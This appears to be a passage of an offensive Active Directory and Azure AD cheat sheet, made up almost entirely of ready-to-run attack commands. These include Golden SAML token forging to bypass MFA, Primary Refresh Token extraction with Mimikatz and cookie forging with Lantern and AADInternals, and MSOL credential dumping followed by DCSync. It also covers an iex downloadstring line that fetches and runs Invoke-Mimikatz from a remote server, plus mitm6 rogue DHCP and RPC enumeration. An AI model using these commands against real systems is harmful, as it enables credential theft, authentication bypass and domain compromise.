WhiskeySAML:
Remotely extract AD FS configuration settings
Forge and sign Golden SAML tokens
Pass the Golden SAML token to the Microsoft Azure portal
Log into the Azure portal as any user while bypassing Azure MFA configurations
Copy python3 shocknawe.py --target-user $user --domain $domain --adfs-host=$adfs_server --dc-ip $ip
PRT Manipulation
PassThePRT
check AzureAdJoined Status and download Mimikatz:
Copy dsregcmd.exe /status
iex (New-Object Net.Webclient).downloadstring(“https://server/Invoke-Mimikatz.ps1”)
Looking for prt and KeyValue :
Copy mimikatz # privilege::debug
mimikatz # sekurlsa::cloudap
use APKD function to decode KeyValue and save "Context" and "DerivedKey" value:
Copy mimikatz # token::elevate
mimikatz # dpapi::cloudapkd /keyvalue:$KeyValue /unprotect
Copy mimikatz # dpapi::cloudapkd /context:$context /derivedkey:$DerivedKey /Prt:$prt
---SNIP---
Signed JWT : eyJ...
Forge PRT-Cookie using lantern :
Copy Lantern.exe cookie --derivedkey <Key from Mimikatz> --context <Context from Mimikatz> --prt <PRT from Mimikatz>
Lantern.exe cookie --sessionkey <SessionKey> --prt <PRT from Mimikatz>
Generate JWT
Copy PS AADInternals> $PRT_OF_USER = '...'
PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
PS AADInternals> $ClearKey = "XXYYZZ..."
PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
MSOL Service Account
you can dump MSOL Service account with azuread_decrypt_msol.ps1 used by Azure AD Connect Sync and launch a DCsync attack with the dumped creds
DCSync with MSOL account
Copy secretsdump -outputfile hashes $domain/$msol_svc_acc:$msol_pwd@$ip
Miscs
Domain Level Attribute
MachineAccountQuota (MAQ) Exploitation
use crackmapexec (CME) with maq module :
cme ldap $dc -d $DOMAIN -u $USER -p $PASSWORD -M maq
BadPwdCount
Copy crackmapexec ldap 10.10.13.100 -u $user -p $pwd --kdcHost 10.10.13.100 --users
LDAP 10.10.13.100 389 dc1 Guest badpwdcount: 0 pwdLastSet: <never>
Abusing IPv6 in AD
sending ICMPv6 packet to the target using ping6 :
ping6 -c 3 <target>
scanning IPv6 address using nmap :
nmap -6 -sCV dead:beef:0000:0000:b885:d62a:d679:573f --max-retries=2 --min-rate=3000 -Pn -T3
tips for adapting tools for ipv6 :
Copy echo -n "port1" "port2" "port3" | xargs -d ' ' -I% bash -c 'socat TCP4-LISTEN:%,fork TCP6:[{ipv6-address-here}]:% &'
netstat -laputen |grep LISTEN
you can replace AF_INET value to AF_INET6 from socket python lib :
Copy sed -i "s/AF_INET/AF_INET6/g" script.py
Rogue DHCP
mitm6 -i eth0 -d 'domain.job.local'
IOXIDResolver Interface Enumeration
it's a little script that enumerate addresses in NetworkAddr field with RPC_C_AUTHN_DCE_PUBLIC level
Copy from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dcomrt import IObjectExporter
RPC_C_AUTHN_DCE_PUBLIC = 2
stringBinding = r'ncacn_ip_tcp:%s' % "IP"
rpctransport = transport.DCERPCTransportFactory(stringBinding)
rpc = rpctransport.get_dce_rpc()
rpc.set_auth_level(RPC_C_AUTHN_DCE_PUBLIC)
rpc.connect()
print("[*] Try with RPC_C_AUTHN_DCE_PUBLIC...")
exporter = IObjectExporter(rpc)
binding = exporter.ServerAlive2()
for bind in binding:
adr = bind['aNetworkAddr']
print("Adresse:", adr)
References